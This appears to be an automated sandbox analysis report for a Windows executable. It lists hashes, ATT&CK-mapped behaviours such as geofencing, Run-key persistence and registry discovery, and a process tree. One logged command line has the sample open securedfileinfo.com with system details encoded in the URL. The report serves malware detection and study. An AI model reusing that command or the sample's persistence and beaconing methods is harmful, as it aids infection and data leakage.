af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe

Analysis

max time kernel
203s
max time network
217s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27/11/2022, 11:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe
Size

143KB
MD5

f05f87e688e0b8150401f40c880be3dd
SHA1

514900380137362c68c99d4235c842b3ec5f8fff
SHA256

af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe
SHA512

1a0eae316225df0d3915e06ca29143afe5366c6c1d2eeb52538e86c096370d0eb3cf10caddc5d75689053e4178f3776cf7a58f4ba1e6f060c9068928f71fb153
SSDEEP

3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45Dv:pe9IB83ID5j

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f0d647f3-c5d1-42c6-8a20-99e23eb3c75a.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221128090513.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3736	msedge.exe
3736	msedge.exe
1452	msedge.exe
1452	msedge.exe
1288	identity_helper.exe
1288	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1452	msedge.exe
1452	msedge.exe
1452	msedge.exe
2176	af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2176	af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2176 wrote to memory of 4844	2176	af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe	80
PID 2176 wrote to memory of 4844	2176	af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe	80
PID 2176 wrote to memory of 4844	2176	af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe	80
PID 4844 wrote to memory of 1452	4844	cmd.exe	82
PID 4844 wrote to memory of 1452	4844	cmd.exe	82
PID 1452 wrote to memory of 4552	1452	msedge.exe	84
PID 1452 wrote to memory of 4552	1452	msedge.exe	84
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 2400	1452	msedge.exe	87
PID 1452 wrote to memory of 3736	1452	msedge.exe	88
PID 1452 wrote to memory of 3736	1452	msedge.exe	88
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89
PID 1452 wrote to memory of 1372	1452	msedge.exe	89

C:\Users\Admin\AppData\Local\Temp\af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe
"C:\Users\Admin\AppData\Local\Temp\af320648d28f7ef8d1c3bc6d216f7fd01a84c13691e2dd5538bbaf52638d4cfe.exe"
1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5304457^&rsn=plde^&details=^|v6.2.9200x64sp0.0ws^|tt31^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://securedfileinfo.com/404.jsp?chid=5304457&rsn=plde&details=|v6.2.9200x64sp0.0ws|tt31|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p1
    3⤵
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff884e646f8,0x7ff884e64708,0x7ff884e64718
      4⤵
      PID:4552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
      4⤵
      PID:2400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
      4⤵
      PID:1372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      4⤵
      PID:1236
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
      4⤵
      PID:3436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4984 /prefetch:8
      4⤵
      PID:1448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
      4⤵
      PID:2144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5864 /prefetch:8
      4⤵
      PID:4200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
      4⤵
      PID:2940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
      4⤵
      PID:2492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 /prefetch:8
      4⤵
      PID:4388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:772
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x21c,0x248,0x7ff6189d5460,0x7ff6189d5470,0x7ff6189d5480
        5⤵
        
        PID:4840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1500,13554981764177692868,6298763091020177635,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1288

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4320

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
167cfd90cb81d3dddd63f107249a0f2e

SHA1
39a78631cc336bb71fe7a02eeb91474bbc335eea

SHA256
4c527164ea0096494cfd68b9e9167c0587c162106e8ec71edc705963c9fc543b

SHA512
013a16d1dc963bf536a156ccb6ea94596887e1d774d6b18636000bbda06b57c135bac00ef046d18022b8512d6abb9bffd3c26b6d10998b4f0e86b46c319b7911

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
472B

MD5
03ad9fc0b00b5df3165dc2fb1e3b0a3e

SHA1
f8243335a8bc24d989bddd346048a055e1d0bdeb

SHA256
366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec

SHA512
a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
724B

MD5
f569e1d183b84e8078dc456192127536

SHA1
30c537463eed902925300dd07a87d820a713753f

SHA256
287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413

SHA512
49553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
6317dda505dcf3ddb244a47422b24169

SHA1
785d4dbf20d8ad26615991b102521c8f4ddc4a93

SHA256
02aa3ad3d43a72899a2904bc35ff84dcf42a32cebe04edb840c383e280f71730

SHA512
bea9837a13c823030a2550b26b54a8c88a57aba4ee3cbe96bf113a92f24992276982b6aad2fd5354c4a2f4ce29fc24a1289a5f2036168312c39241e5b432c62b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
402B

MD5
881ccc62959cfbd42ac6a8d136b20b84

SHA1
7c44d1eb29a179ea79ccb4d3bafd546364e96ad7

SHA256
aff23d007c7181e6b84d2ad6d278edca8a34f38207dc6efe391841cb716b87f1

SHA512
b1626bae62d991ee2d308701a8f8a30f2310e52c269267802a789a362f2233d206b5840c8ccda884e0fb83ab9f8ae6eef6e20639f5bd9747af368302d21880e5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
392B

MD5
d08742f773defeb712a55adaa82b9853

SHA1
7816a054ed756f9090dc945e60e44bffd753061e

SHA256
85dcf4f847910ebb620ebc49df4bc8808f23018b1be96bdb4f82fe16c44a72f4

SHA512
cba027bf7a7ed4dc7b9db2c6a257af42db29ae8f59ffc15aff92ff9246ea35828515f869bda998f9e3cc7204912c8c0b9175ccf4700dcedb5984ff3529bad3a6

Download Submit